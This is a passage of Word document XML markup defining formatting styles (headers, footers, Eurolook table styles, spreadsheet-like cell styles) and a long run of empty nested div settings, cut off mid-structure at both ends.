    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="2"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4150"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="2"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MacroTextChar1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>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0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MacroTextChar1">
    <w:name w:val="Macro Text Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="MacroText"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="EurolookClassicBlue">
    <w:name w:val="Eurolook Classic Blu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Grey">
    <w:name w:val="Eurolook Classic Grey"/>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Olive">
    <w:name w:val="Eurolook Classic Oliv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Petrol">
    <w:name w:val="Eurolook Classic Petrol"/>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urple">
    <w:name w:val="Eurolook Classic Purpl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Rust">
    <w:name w:val="Eurolook Classic Rust"/>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LightBlue">
    <w:name w:val="Eurolook Light Blu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
    <w:name w:val="Eurolook Light Grey"/>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
    <w:name w:val="Eurolook Light Oliv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
    <w:name w:val="Eurolook Light Petrol"/>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
    <w:name w:val="Eurolook Light Purpl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
    <w:name w:val="Eurolook Light Rust"/>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Table">
    <w:name w:val="Eurolook Table"/>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StylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="PropertiesTable">
    <w:name w:val="Properties Table"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblInd w:w="1984" w:type="dxa"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleCol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History">
    <w:name w:val="Table History"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>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etterhead">
    <w:name w:val="Table Letterhead"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="340" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DateChar1">
    <w:name w:val="Date Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Date"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00ED0D5C"/>
    <w:rPr>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar1">
    <w:name w:val="Endnote Text Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED0D5C"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar1">
    <w:name w:val="Footnote Text Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="FootnoteText"/>
    <w:semiHidden/>
    <w:rsid w:val="00ED0D5C"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar1">
    <w:name w:val="Title Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00ED0D5C"/>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A82790"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="Style2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00604315"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="26"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Style3">
    <w:name w:val="Style3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00062F35"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="27"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ui-provider">
    <w:name w:val="ui-provider"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B03BC4"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl65">
    <w:name w:val="xl65"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl66">
    <w:name w:val="xl66"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="000000" w:fill="0070C0"/>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl67">
    <w:name w:val="xl67"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="000000" w:fill="0070C0"/>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl68">
    <w:name w:val="xl68"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl69">
    <w:name w:val="xl69"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl70">
    <w:name w:val="xl70"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl71">
    <w:name w:val="xl71"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002F53B7"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="100" w:beforeAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent5">
    <w:name w:val="Grid Table 4 Accent 5"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:locked/>
    <w:rsid w:val="0071360A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia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3">
    <w:name w:val="List Table 3 Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="005235B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locked/>
    <w:rsid w:val="00960D1D"/>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locked/>
    <w:rsid w:val="00A24E9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locked/>
    <w:rsid w:val="00FA5B5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locked/>
    <w:rsid w:val="00D02E9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locked/>
    <w:rsid w:val="00D02E9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locked/>
    <w:rsid w:val="0025002E"/>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locked/>
    <w:rsid w:val="002500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3">
    <w:name w:val="List Table 6 Colorful Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="0025002E"/>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locked/>
    <w:rsid w:val="00696A9C"/>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504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="4131957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="4327834">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="32846584">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="33192043">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="38748935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="90051607">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="118885838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="126318670">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="142897824">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="154884957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="179973290">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="216286603">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="226887448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="231817329">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="243032459">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="259458911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="294062937">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="319189256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="320044054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="331026010">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="332874841">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="344406011">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="421147288">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="435297720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="491683571">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="584605808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="589044151">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="592471984">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="601035272">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="611934222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1655643179">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="118962483">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1490705067">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
